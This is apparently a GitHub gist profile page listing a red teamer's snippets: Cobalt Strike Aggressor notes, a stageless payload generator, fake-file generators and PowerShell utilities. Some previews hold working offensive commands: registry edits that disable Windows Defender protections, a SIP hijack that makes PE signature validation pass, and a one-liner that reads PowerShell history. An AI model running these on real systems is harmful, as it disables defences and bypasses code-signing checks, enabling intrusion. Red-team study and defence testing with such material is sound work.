Skip to content

Instantly share code, notes, and snippets.

View vestjoe's full-sized avatar

vestjoe

109 followers · 3 following
View GitHub Profile
@vestjoe
vestjoe / Aggressor_Script_Notes.md
Last active December 13, 2021 13:50

Aggressor Scripting Notes

Read data from the C2 profile

# Read the intial sleep time set in the c2 profile
$profile = data_query("metadata")["c2profile"];
$initialsleep = [$profile getString: ".sleeptime"];
$initialjitter = [$profile getString: ".jitter"];
@vestjoe
vestjoe / stageless_payload_generator.cna
Last active August 6, 2021 15:26
# Staged Payload Generator
# Author: @joevest
# Generates all stageless payload types for each current listener
# Directory for Payloads
mkdir("/payloads");
println("Stageless Payload Generator");
menubar("Stageless Payload Generator", "payloadgenerator");
@vestjoe
vestjoe / random_file_generator.py
Last active March 10, 2024 19:57
Generate valid random files
# Random file generator
# This tool generates random valid files of various types using real data based on Loreum Ipsum. Files are created in a custom directory structure.
# Generates random files based on Lorem Ipsum text
# Generates random file names from word list
# Generate valid files of type: txt, docx, xlsx, pptx, xml, config
# Requirements
# On windows download and install lxml manually: https://pypi.python.org/pypi/lxml/3.4.4
'''
@vestjoe
vestjoe / find-files.ps1
Last active August 6, 2020 16:04
PowerShell file search
Function Find-Files() {
<#
.SYNOPSIS
Returns file list based on search terms.
.DESCRIPTION
Function: Find-Files
@vestjoe
vestjoe / generate_fake_files.ps1
Created August 3, 2020 11:42
Function GET-RdmString() {
param (
[int]$Length
)
$set = "abcdefghijklmnopqrstuvwxyz0123456789".ToCharArray()
$result = ""
for ($x = 0; $x -lt $Length; $x++) {
$result += $set | Get-Random
}
return $result
@vestjoe
vestjoe / disable_windows_av.md
Created March 17, 2020 13:21
Disable Windows AV for testing

Windows 10 Disable Virus and Threat Protections

:: Turn Off Windows Defender
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f

:: Cloud-protection level
@vestjoe
vestjoe / usersim.ps1
Created April 18, 2019 16:49
usersim
param
(
$username,
$password,
$domain
)
# Setup User Simulation
"[*] Setting up User Simulation" | Out-File -FilePath C:\Users\Public\usersim.txt -Append
$run = 'HKLM:\\\\SOFTWARE\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run'
@vestjoe
vestjoe / SIP_stuff.md
Last active August 31, 2018 15:25

Change SIP Signature validation for PE files


reg ADD "HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}" /v DLL /t REG_SZ /d C:\Windwows\System32\ntdll.dll /f
reg ADD "HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}" /v FuncName /t REG_SZ /d DbgUiContinue /f

Change SIP Signature validation for signed PowerShell scripts

@vestjoe
vestjoe / PowerShell.md
Last active August 29, 2018 14:42

PowerShell.md

PowerShell commandline history

Get-PSReadlineOption | Select-Object -ExpandProperty HistorySavePath | Get-ChildItem | Get-Content

Screenshot

@vestjoe
vestjoe / python.md
Created August 17, 2018 02:58

Pyinstaller

python -m PyInstaller --onefile <script.py>